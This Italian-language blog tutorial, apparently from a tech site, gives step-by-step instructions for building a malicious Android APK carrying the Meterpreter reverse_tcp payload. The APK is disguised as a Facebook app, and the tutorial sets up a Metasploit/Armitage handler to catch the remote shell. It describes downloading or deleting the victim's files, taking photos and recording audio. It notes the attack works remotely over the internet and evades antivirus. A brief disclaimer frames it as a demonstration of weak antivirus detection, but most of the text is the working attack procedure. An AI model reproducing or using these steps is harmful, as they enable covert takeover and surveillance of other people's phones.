Leggi Anche: 7 tools pentesting per Ubuntu

Premetto che con questa guida non vi voglio invogliare a fare una cosa del genere contro una persona qualunque, questa guida vuole solo approfondire come i sistemi Antivirus Google (e non) siano inefficienti, e non sono in grado di riconoscere un Malware ormai conosciuto da molti anni cioè il cosiddetto Payload Meterpreter “versione Android”.
il Payload si chiama android/meterpreter/reverse_tcp, e cosa fa, voi vi chiederete?
Crea una reverse connection tra Android (comunque è un vero e proprio trojan) e il nostro PC, quindi noi, cosa potremmo fare? La risposta è semplice, possiamo accedere alla shell (o riga di comando) Android
possiamo usare comandi come cd /storage/sdcard per accedere alla Memoria interna del telefono e scaricare tutti i files della vittima o eventualmente eliminarli, con sysinfo possiamo avere tutte le info sul Dispositivo, il Kernel e il linguaggio (java/java), il nome ( di solito @localhost), scattare foto con la webcam, registrare sia con microfono e fotocamera… insomma non poche cose, tra l’altro rischiose come nel primo caso

Prima fase, creazione APK malevolo

Il canale Telegram di InTheBit con le migliori offerte techle migliori offerte tech

Creazione dell’APK Malevolo, al suo interno il PAYLOAD android/meterpreter/reverse_tcp cercando di farlo sembrare il piu’ possibile il contrario

Utilizziamo il comando:

sudo msfpayload android/meterpreter/reverse_tcp LHOST=(Tuo IP) LPORT=(quella che volete) R > /root/Desktop/facebook_4.0.apk (per Ubuntu: /home/Scrivania/facebook_4.0.apk)

quindi apriamo una shell linux, e digitiamo il comando riportato sopra:

msfpayload

per LHOST dovete digitare su un’altra console ifconfig e vedere il vostro IP LOCALE
per LPORT mettete 443

Seconda fase, trasferimento sul telefono e installazione(non aprire)
Una volta ottenuto il file “facebook_4.0.apk” trasferiamolo sul nostro telefono
io userò Airdroid.
AirDroidAPK
Installiamo l’APK dal percorso in cui l’abbiamo trasferito
ci apparirà non Facebook ma un’app chiamata “MainActivity”.
Terza fase, apriamo Armitage
Ora apriamo Armitage da shell con i seguenti comandi:
sudo service postgresql start 
sudo service metasploit start
sudo armitage
ArmitageStart
ArmitageHome
Quarta fase, impostazione del “listener”
Avremo quindi davanti un programmino interessante per effettuare attacchi di questo tipo, andiamo a settare il cosiddetto Listener che consentira il rilevamento e l’intrusione nel sistema Android.
Quindi nella “Shell” (la parte nera in basso) andremo a scrivere i seguenti comandi:
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST (indirizzo IP locale del PC)
set LPORT (la porta impostata al momento della creazione dell'APK)
set ExitOnSession false
exploit -j

ArmitageListener

Quinta e ultima fase, apriamo l’apk ed eseguiamo vari comandi

Abbiamo impostato il listener, quindi possiamo avviare l’APK dal telefono, aspettiamo pochi istanti ed ecco che in Armitage appare il nostro device con tanto di indirizzo IP e logo del sistema operativo “impossessati” da dei fulmini

AndroidHacked

da qui potremo eseguire comandi come sysinfo (per vedere info sul telefono), cd (per navigare nelle cartelle nelle telefono), e i comandi generali di Android, inoltre ci sono i comandi di Meterpreter, come per esempio, la possibilità di registrare da webcam.
Android_sysinfo_remoteshell
Come possiamo vedere, installando un semplice APK, possiamo prendere il controllo del telefono, semplicemente, senza che nessun antivirus lo rilevi. Questo può essere fatto a distanza impostando nella sezione LHOST il nostro IP Esterno.